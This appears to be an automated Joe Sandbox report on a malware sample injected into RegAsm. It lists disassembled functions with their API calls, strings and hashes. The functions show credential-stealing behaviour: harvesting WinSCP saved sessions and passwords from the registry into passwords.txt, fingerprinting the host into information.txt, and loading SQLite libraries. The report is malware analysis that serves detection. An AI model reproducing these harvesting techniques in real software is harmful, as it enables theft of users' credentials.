Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internetlstrlen$lstrcpy$CloseHandle$HeapHttpOpenRequest_memmovelstrcat$AllocConnectCrackFileOptionProcessReadSend
String ID: "$"$"$------$------$------$------$58cd250b15e666e5f72fcf5caa6cb131$_wA$build_id$mode
API String ID: 3702379033-2423882551
Opcode ID: d0d4dd3083067bed78c18a1f87fb58fc4d70a76ae8ff56833aff88fabdc62f8f
Instruction ID: d7eca80f77f91b7642c34a4b8a2efe564294a89bb46c215ef7dcca6b5cef4dcb
Opcode Fuzzy Hash: d0d4dd3083067bed78c18a1f87fb58fc4d70a76ae8ff56833aff88fabdc62f8f
Instruction Fuzzy Hash: 7022C9719401699BCF21EB62CD46BCCB7B5AF04308F4144E7A60DB3151DAB56FCA8FA8

Function 0040E186 Relevance: 51.1, APIs: 15, Strings: 14, Instructions: 325
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 0040E1B7
_memset.LIBCMT ref: 0040E1D7
_memset.LIBCMT ref: 0040E1E8
_memset.LIBCMT ref: 0040E1F9
RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E22D
RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,?), ref: 0040E25E
RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E2BD
RegEnumKeyExA.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 0040E2E0
RegGetValueA.ADVAPI32(?,?,HostName,00000002,00000000,?,?,Host: ,Soft: WinSCP,004368EF), ref: 0040E379
RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,?,?), ref: 0040E3D9

Strings

Host: , xrefs: 0040E32A
HostName, xrefs: 0040E367
Software\Martin Prikryl\WinSCP 2\Sessions, xrefs: 0040E2B3
Security, xrefs: 0040E253
Password: , xrefs: 0040E529
UseMasterPassword, xrefs: 0040E24E
PortNumber, xrefs: 0040E3BD
Software\Martin Prikryl\WinSCP 2\Configuration, xrefs: 0040E20B
passwords.txt, xrefs: 0040E662
Login: , xrefs: 0040E459
:22, xrefs: 0040E42D
UserName, xrefs: 0040E496
Password, xrefs: 0040E515
Soft: WinSCP, xrefs: 0040E2FE

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _memset$Value$Open$Enum
String ID: Login: $:22$Host: $HostName$Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
API String ID: 3303087153-2798830873
Opcode ID: ecb68a3f0fb3f5f29207da25597acd2791be6751dd897dc87ccd0ad97958169b
Instruction ID: 055c08f46d5067d6d834f6975861f9e19b2ff827753642eb3d617421de422a5d
Opcode Fuzzy Hash: ecb68a3f0fb3f5f29207da25597acd2791be6751dd897dc87ccd0ad97958169b
Instruction Fuzzy Hash: C8D1E7B191012DAADF20EB95DC42BD9B778AF04308F5018EBA908B3151DA757FC9CFA5

Function 0041860C Relevance: 48.2, APIs: 32, Instructions: 154
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32 ref: 0041864D
GetProcAddress.KERNEL32 ref: 00418664
GetProcAddress.KERNEL32 ref: 0041867B
GetProcAddress.KERNEL32 ref: 00418692
GetProcAddress.KERNEL32 ref: 004186A9
GetProcAddress.KERNEL32 ref: 004186C0
GetProcAddress.KERNEL32 ref: 004186D7
GetProcAddress.KERNEL32 ref: 004186EE
GetProcAddress.KERNEL32 ref: 00418705
GetProcAddress.KERNEL32 ref: 0041871C
GetProcAddress.KERNEL32 ref: 00418733
GetProcAddress.KERNEL32 ref: 0041874A
GetProcAddress.KERNEL32 ref: 00418761
GetProcAddress.KERNEL32 ref: 00418778
GetProcAddress.KERNEL32 ref: 0041878F
GetProcAddress.KERNEL32 ref: 004187A6
GetProcAddress.KERNEL32 ref: 004187BD
GetProcAddress.KERNEL32 ref: 004187D4
GetProcAddress.KERNEL32 ref: 004187EB
GetProcAddress.KERNEL32 ref: 00418802
LoadLibraryA.KERNEL32(?,0041848B), ref: 00418813
LoadLibraryA.KERNEL32(?,0041848B), ref: 00418824
LoadLibraryA.KERNEL32(?,0041848B), ref: 00418835
LoadLibraryA.KERNEL32(?,0041848B), ref: 00418846
LoadLibraryA.KERNEL32(?,0041848B), ref: 00418857
GetProcAddress.KERNEL32(75A70000,0041848B), ref: 00418873
GetProcAddress.KERNEL32(75290000,0041848B), ref: 0041888E
GetProcAddress.KERNEL32 ref: 004188A5
GetProcAddress.KERNEL32(75BD0000,0041848B), ref: 004188C0
GetProcAddress.KERNEL32(75450000,0041848B), ref: 004188DB
GetProcAddress.KERNEL32(76E90000,0041848B), ref: 004188F6
GetProcAddress.KERNEL32 ref: 0041890D

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID:
API String ID: 2238633743-0
Opcode ID: 4332a02b9d0c5ae084649ce964c8752c17ba0114f4f265c81da2c6ba2930f8e7
Instruction ID: bd0feea27713c7d7df585fd29c16e03324b4d812accd9a2583cdf4412740ba17
Opcode Fuzzy Hash: 4332a02b9d0c5ae084649ce964c8752c17ba0114f4f265c81da2c6ba2930f8e7
Instruction Fuzzy Hash: BB711775910312AFEF1ADF61FD488243BA7F70874BF11A426E91582270EB374A64EF54

Function 00413B4F Relevance: 47.9, APIs: 2, Strings: 25, Instructions: 674
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00417044,004366C7,?,?,?,?,00418558), ref: 0041050D

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00417065,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00417065,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00417065,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00417083,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 004105BD

Part of subcall function 00410CC0: GetProcessHeap.KERNEL32(00000000,00000104,?,Version: ,004365B6,?,?,?), ref: 00410CD8
Part of subcall function 00410CC0: HeapAlloc.KERNEL32(00000000), ref: 00410CDF
Part of subcall function 00410CC0: GetLocalTime.KERNEL32(?), ref: 00410CEB
Part of subcall function 00410CC0: wsprintfA.USER32 ref: 00410D16

Part of subcall function 004115D4: _memset.LIBCMT ref: 00411607
Part of subcall function 004115D4: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 00411626
Part of subcall function 004115D4: RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 0041164B
Part of subcall function 004115D4: CharToOemA.USER32(?,?), ref: 0041166B

Part of subcall function 00411684: GetCurrentHwProfileA.ADVAPI32(?), ref: 0041169F
Part of subcall function 00411684: _memset.LIBCMT ref: 004116CE
Part of subcall function 00411684: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 004116F6
Part of subcall function 00411684: lstrcatA.KERNEL32(?,00436EC4,?,?,?,?,?), ref: 00411713

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175B2,004366D6), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 004109A2: GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 004109D5
Part of subcall function 004109A2: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00410A15
Part of subcall function 004109A2: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00410A6A
Part of subcall function 004109A2: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410A71

GetCurrentProcessId.KERNEL32(Path: ,00436874,HWID: ,00436868,GUID: ,0043685C,00000000,MachineID: ,0043684C,00000000,Date: ,00436840,0043683C,004379A4,Version: ,004365B6), ref: 00413DA4

Part of subcall function 0041224A: OpenProcess.KERNEL32(00000410,00000000,00413DB3,00000000,?), ref: 0041226C
Part of subcall function 0041224A: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00412287
Part of subcall function 0041224A: CloseHandle.KERNEL32(00000000), ref: 0041228E

Part of subcall function 00410B30: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00413E5E,Windows: ,00436898), ref: 00410B44
Part of subcall function 00410B30: HeapAlloc.KERNEL32(00000000,?,?,?,00413E5E,Windows: ,00436898), ref: 00410B4B

Part of subcall function 00411807: __EH_prolog3_catch_GS.LIBCMT ref: 0041180E
Part of subcall function 00411807: CoInitializeEx.OLE32(00000000,00000000,0000004C,00413EC2,Install Date: ,004368A8,00000000,Windows: ,00436898,Work Dir: In memory,00436880), ref: 0041181F
Part of subcall function 00411807: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00411830
Part of subcall function 00411807: CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 0041184A
Part of subcall function 00411807: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411880
Part of subcall function 00411807: VariantInit.OLEAUT32(?), ref: 004118DB

Part of subcall function 00411997: __EH_prolog3_catch.LIBCMT ref: 0041199E
Part of subcall function 00411997: CoInitializeEx.OLE32(00000000,00000000,00000030,00413F30,?,AV: ,004368BC,Install Date: ,004368A8,00000000,Windows: ,00436898,Work Dir: In memory,00436880), ref: 004119AD
Part of subcall function 00411997: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 004119BE
Part of subcall function 00411997: CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 004119D8
Part of subcall function 00411997: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411A0E
Part of subcall function 00411997: VariantInit.OLEAUT32(?), ref: 00411A5D

Part of subcall function 00410C85: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C91
Part of subcall function 00410C85: HeapAlloc.KERNEL32(00000000,?,?,?,00401385), ref: 00410C98
Part of subcall function 00410C85: GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410CAC

Part of subcall function 00410C53: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C5F
Part of subcall function 00410C53: HeapAlloc.KERNEL32(00000000,?,?,?,004013B9), ref: 00410C66
Part of subcall function 00410C53: GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C7A

Part of subcall function 00411563: CreateDCA.GDI32(00000000,00000000,00000000,00000000), ref: 00411575
Part of subcall function 00411563: GetDeviceCaps.GDI32(00000000,00000008), ref: 00411580
Part of subcall function 00411563: GetDeviceCaps.GDI32(00000000,0000000A), ref: 0041158B
Part of subcall function 00411563: ReleaseDC.USER32(00000000,00000000), ref: 00411596
Part of subcall function 00411563: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00414061,?,Display Resolution: ,004368EC,00000000,User Name: ,004368DC,00000000,Computer Name: ,004368C8,AV: ,004368BC), ref: 004115A2
Part of subcall function 00411563: HeapAlloc.KERNEL32(00000000,?,?,00414061,?,Display Resolution: ,004368EC,00000000,User Name: ,004368DC,00000000,Computer Name: ,004368C8,AV: ,004368BC,Install Date: ), ref: 004115A9
Part of subcall function 00411563: wsprintfA.USER32 ref: 004115BB

Part of subcall function 00410DDB: GetKeyboardLayoutList.USER32(00000000,00000000,00436707,?,?), ref: 00410E0C
Part of subcall function 00410DDB: LocalAlloc.KERNEL32(00000040,00000000), ref: 00410E1A
Part of subcall function 00410DDB: GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00410E28
Part of subcall function 00410DDB: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 00410E57
Part of subcall function 00410DDB: LocalFree.KERNEL32(00000000), ref: 00410EFF

Part of subcall function 00410D2E: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00410D49
Part of subcall function 00410D2E: HeapAlloc.KERNEL32(00000000), ref: 00410D50
Part of subcall function 00410D2E: GetTimeZoneInformation.KERNEL32(?), ref: 00410D5F
Part of subcall function 00410D2E: wsprintfA.USER32 ref: 00410D7D

Part of subcall function 00410F51: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,0041421B,Processor: ,[Hardware],00436948,00000000,TimeZone: ,00436938,00000000,Local Time: ,00436924), ref: 00410F65
Part of subcall function 00410F51: HeapAlloc.KERNEL32(00000000,?,?,?,0041421B,Processor: ,[Hardware],00436948,00000000,TimeZone: ,00436938,00000000,Local Time: ,00436924,Keyboard Languages: ,00436908), ref: 00410F6C
Part of subcall function 00410F51: RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436880,?,?,?,0041421B,Processor: ,[Hardware],00436948,00000000,TimeZone: ,00436938,00000000,Local Time: ), ref: 00410F8A
Part of subcall function 00410F51: RegQueryValueExA.KERNEL32(00436880,00000000,00000000,00000000,000000FF,?,?,?,0041421B,Processor: ,[Hardware],00436948,00000000,TimeZone: ,00436938,00000000), ref: 00410FA6

Part of subcall function 00411007: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,?), ref: 0041107D
Part of subcall function 00411007: wsprintfA.USER32 ref: 004110DB

Part of subcall function 00410FBA: GetSystemInfo.KERNEL32(?), ref: 00410FD4
Part of subcall function 00410FBA: wsprintfA.USER32 ref: 00410FEC

Part of subcall function 00411119: GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,00436908,Display Resolution: ,004368EC,00000000,User Name: ,004368DC,00000000,Computer Name: ,004368C8,AV: ,004368BC,Install Date: ), ref: 00411131
Part of subcall function 00411119: HeapAlloc.KERNEL32(00000000), ref: 00411138
Part of subcall function 00411119: GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 00411154
Part of subcall function 00411119: wsprintfA.USER32 ref: 0041117A

Part of subcall function 00411192: EnumDisplayDevicesA.USER32(00000000,00000000,?,00000001), ref: 004111E9

Part of subcall function 004114A5: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0043673D,?,?), ref: 004114D4
Part of subcall function 004114A5: Process32First.KERNEL32(00000000,00000128), ref: 004114E4
Part of subcall function 004114A5: Process32Next.KERNEL32(00000000,00000128), ref: 00411542
Part of subcall function 004114A5: CloseHandle.KERNEL32(00000000), ref: 0041154D

Part of subcall function 00411203: RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0043670B,00000000,?,?), ref: 00411273
Part of subcall function 00411203: RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 004112B0
Part of subcall function 00411203: wsprintfA.USER32 ref: 004112DD
Part of subcall function 00411203: RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 004112FC
Part of subcall function 00411203: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00411332
Part of subcall function 00411203: lstrlenA.KERNEL32(?), ref: 00411347

Part of subcall function 00411203: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,00436E84), ref: 004113DC

lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,Keyboard Languages: ,00436908,Display Resolution: ,004368EC,00000000,User Name: ,004368DC,00000000), ref: 0041452C

Part of subcall function 00416E60: CreateThread.KERNEL32(00000000,00000000,00416D8F,?,00000000,00000000), ref: 00416EFF
Part of subcall function 00416E60: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F07

Strings

RAM: , xrefs: 00414319
[Hardware], xrefs: 004141D6
information.txt, xrefs: 0041453C
Path: , xrefs: 00413D84
Display Resolution: , xrefs: 00414038
Date: , xrefs: 00413BE8
Version: , xrefs: 00413B68
Local Time: , xrefs: 00414114
Processor: , xrefs: 004141F6
Cores: , xrefs: 00414257
MachineID: , xrefs: 00413C49
[Software], xrefs: 0041446C
VideoCard: , xrefs: 00414380
Install Date: , xrefs: 00413E9A
Threads: , xrefs: 004142B8
[Processes], xrefs: 004143F3
Keyboard Languages: , xrefs: 004140A7
TimeZone: , xrefs: 00414175
Work Dir: In memory, xrefs: 00413DF9
AV: , xrefs: 00413F07
GUID: , xrefs: 00413CAA
User Name: , xrefs: 00413FD7
Computer Name: , xrefs: 00413F76
Windows: , xrefs: 00413E39
HWID: , xrefs: 00413D17

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$Process$Alloc$wsprintf$CreateOpen$InitializeQueryValuelstrcatlstrcpy$InformationLocalNamelstrlen$BlanketCapsCloseCurrentDeviceEnumHandleInfoInitInstanceKeyboardLayoutListProcess32ProxySecurityTimeVariant_memset$CharComputerDevicesDirectoryDisplayFileFirstFreeGlobalH_prolog3_catchH_prolog3_catch_LocaleLogicalMemoryModuleNextObjectProcessorProfileReleaseSingleSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZone
String ID: AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $User Name: $Version: $VideoCard: $Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
API String ID: 681701770-1014693891
Opcode ID: 6f87393862becc57fbbdd16467dcb7da603c6cf4a34e40c15e9169b4a79dae42
Instruction ID: 441d3ae57d19fa342472858c1180299489366c71e834a527016756c81504465d
Opcode Fuzzy Hash: 6f87393862becc57fbbdd16467dcb7da603c6cf4a34e40c15e9169b4a79dae42
Instruction Fuzzy Hash: 14527C71D4001EAACF01FBA6DD429DDB7B5AF04308F51416BB510771A1DBB87E8E8B98

Function 0040852E Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 230
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00417044,004366C7,?,?,?,?,00418558), ref: 0041050D

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,004366FB,?), ref: 00411C79

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00417065,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00417065,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00417065,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175B2,004366D6), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00417083,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 004105BD

CopyFileA.KERNEL32(?,?,00000001,00437190,004367C2,?,?,?), ref: 004085D3
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00408628
RtlAllocateHeap.NTDLL(00000000), ref: 0040862F
lstrlenA.KERNEL32(?), ref: 004086CB
lstrcatA.KERNEL32(?), ref: 004086E4
lstrcatA.KERNEL32(?,?), ref: 004086EE
lstrcatA.KERNEL32(?,00437194), ref: 004086FA
lstrcatA.KERNEL32(?,?), ref: 00408704
lstrcatA.KERNEL32(?,00437198), ref: 00408710
lstrcatA.KERNEL32(?), ref: 0040871D
lstrcatA.KERNEL32(?,?), ref: 00408727
lstrcatA.KERNEL32(?,0043719C), ref: 00408733
lstrcatA.KERNEL32(?), ref: 00408740
lstrcatA.KERNEL32(?,?), ref: 0040874A
lstrcatA.KERNEL32(?,004371A0), ref: 00408756
lstrcatA.KERNEL32(?), ref: 00408763
lstrcatA.KERNEL32(?,?), ref: 0040876D
lstrcatA.KERNEL32(?,004371A4), ref: 00408779
lstrcatA.KERNEL32(?,004371A8), ref: 00408785
lstrlenA.KERNEL32(?), ref: 004087BE
DeleteFileA.KERNEL32(?), ref: 0040880B

Strings

passwords.txt, xrefs: 004087CE

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
String ID: passwords.txt
API String ID: 1956182324-347816968
Opcode ID: ea086920ada5386683364fd7a06bf6c7dc596c925699c8f79d29885de5bae042
Instruction ID: b1a2efcfa5bdb3df5db9219e748ab06c96c9523fe0244b9b68265e97ac535b76
Opcode Fuzzy Hash: ea086920ada5386683364fd7a06bf6c7dc596c925699c8f79d29885de5bae042
Instruction Fuzzy Hash: 79813132900208ABCF05FFA1EE4A9CD7B76BF08315F205026F501B31A1EB7A5E559B99

Function 0041697F Relevance: 37.0, APIs: 8, Strings: 13, Instructions: 249
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,0041713D,004366CF,004366CE,?,?,?,?,00418558), ref: 0041054F
Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,0041713D,004366CF,004366CE,?,?,?,?,00418558), ref: 00410581

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00417044,004366C7,?,?,?,?,00418558), ref: 0041050D

Part of subcall function 0041688F: StrCmpCA.SHLWAPI(?,ERROR), ref: 004168E3
Part of subcall function 0041688F: lstrlenA.KERNEL32(?), ref: 004168EE
Part of subcall function 0041688F: StrStrA.SHLWAPI(00000000,?), ref: 00416903
Part of subcall function 0041688F: lstrlenA.KERNEL32(?), ref: 00416912
Part of subcall function 0041688F: lstrlenA.KERNEL32(00000000), ref: 0041692B

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00417083,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 004105BD

StrCmpCA.SHLWAPI(?,ERROR), ref: 00416A69
StrCmpCA.SHLWAPI(?,ERROR), ref: 00416AC2
StrCmpCA.SHLWAPI(?,ERROR), ref: 00416B22
StrCmpCA.SHLWAPI(?,ERROR), ref: 00416B7B
StrCmpCA.SHLWAPI(?,ERROR), ref: 00416B91
StrCmpCA.SHLWAPI(?,ERROR), ref: 00416BA7
StrCmpCA.SHLWAPI(?,ERROR), ref: 00416BB9
Sleep.KERNEL32(0000EA60), ref: 00416BC8

Strings

ERROR, xrefs: 00416A61
sqlite3.dll, xrefs: 00416C65
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0, xrefs: 00416C77
sqlp.dll, xrefs: 00416CC7
ERROR, xrefs: 00416BB1
ERROR, xrefs: 00416B1A
ERROR, xrefs: 00416B9F
ERROR, xrefs: 00416B73
sqlp.dll, xrefs: 00416C96
ERROR, xrefs: 00416B89
ERROR, xrefs: 00416ABA
sqlite3.dll, xrefs: 00416C31
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0, xrefs: 00416CA8

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

